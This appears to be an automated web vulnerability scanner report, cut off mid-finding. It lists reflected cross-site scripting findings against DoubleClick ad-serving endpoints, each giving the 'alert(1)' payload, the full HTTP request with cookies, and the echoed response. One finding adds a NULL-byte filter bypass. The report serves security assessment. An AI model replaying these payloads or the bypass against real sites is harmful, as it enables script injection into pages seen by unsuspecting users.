GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=a01ea"-alert(1)-"f73a2c9f20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6646
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:51:02 GMT
Expires: Sun, 30 Jan 2011 14:51:02 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=a01ea"-alert(1)-"f73a2c9f20http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/u%3B234266403%3B0-0%3B0%3B58044025%3B4307-300/250%3B38529133/38546890/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PL
...[SNIP]...

5.21. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42002"-alert(1)-"c30755c1247 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!42002"-alert(1)-"c30755c1247&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:48:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6510

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!42002"-alert(1)-"c30755c1247&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/n%3B234266403%3B1-0%3B0%3B5804402
...[SNIP]...

5.22. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a71d5"-alert(1)-"c72810b521d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334a71d5"-alert(1)-"c72810b521d&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6543

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334a71d5"-alert(1)-"c72810b521d&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/l%3B234280362%3B0-0%3B0%3B58044029%3B4307-300/250
...[SNIP]...

5.23. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b51a"-alert(1)-"6a635320be6 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=22476116b51a"-alert(1)-"6a635320be6&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6666

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ar minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=22476116b51a"-alert(1)-"6a635320be6&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/t%3B234282361%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs
...[SNIP]...

5.24. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6f6d"-alert(1)-"a0cc74f8d36 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987af6f6d"-alert(1)-"a0cc74f8d36&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6666

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987af6f6d"-alert(1)-"a0cc74f8d36&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/z%3B234282361%3B2-0%3B0%3B58044029%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.
...[SNIP]...

5.25. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed08d"-alert(1)-"738e3685fea was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSNed08d"-alert(1)-"738e3685fea&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6685

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSNed08d"-alert(1)-"738e3685fea&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/n%3B234280362%3B1-0%3B0%3B58044029%3B4307-300/250%3B39750649/39768436/2%3B%3B%7Esscs%3D%3fhttp
...[SNIP]...

5.26. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 683a3"-alert(1)-"726bafe38a0 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=683a3"-alert(1)-"726bafe38a0&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6511

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
is_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=683a3"-alert(1)-"726bafe38a0&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/l%3B234280362%3B0-0%3B0%3B58044029%3B4307-300/250%3B39750646/39768433/2%3
...[SNIP]...

5.27. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a076a"-alert(1)-"1cdbc5ea870 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=Ga076a"-alert(1)-"1cdbc5ea870&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6498

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
nar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=Ga076a"-alert(1)-"1cdbc5ea870&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B385
...[SNIP]...

5.28. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2871e"-alert(1)-"f53a100785a was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=2871e"-alert(1)-"f53a100785a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6666
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:50:57 GMT
Expires: Sun, 30 Jan 2011 14:50:57 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=2871e"-alert(1)-"f53a100785ahttp://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/t%3B234282361%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PL
...[SNIP]...

5.29. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f0b"-alert(1)-"64d1b9420e8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!90f0b"-alert(1)-"64d1b9420e8&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:48:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6638

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!90f0b"-alert(1)-"64d1b9420e8&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/m%3B234282360%3B0-0%3B0%3B58044029%3
...[SNIP]...

5.30. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50fe1'-alert(1)-'b07da9e25d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=780525050fe1'-alert(1)-'b07da9e25d&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:49:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6390

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=780525050fe1'-alert(1)-'b07da9e25d&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/v%3B231464797%3B0-0%3B0%3B55598777%3B4307-300/
...[SNIP]...

5.31. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f557d"-alert(1)-"4d059799fd4 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=f557d"-alert(1)-"4d059799fd4&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:49:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6211

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2905/11HI_GENERAL_BACKUP_300x250.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=f557d"-alert(1)-"4d059799fd4&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d6/%2a/x%3B231464651%3B0-0%3B0%3B55598777%3B4307-300/
...[SNIP]...

5.32. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0092a16"-alert(1)-"41f375ff973 was submitted in the &PID parameter. This input was echoed as 92a16"-alert(1)-"41f375ff973 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250%0092a16"-alert(1)-"41f375ff973&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
